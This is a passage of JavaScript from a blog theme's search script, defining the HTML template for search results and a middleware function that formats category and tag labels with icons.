px-lg-4 px-xl-0"><header><h2><a href="{url}">{title}</a></h2><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div></header><p>{snippet}</p></article>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script>
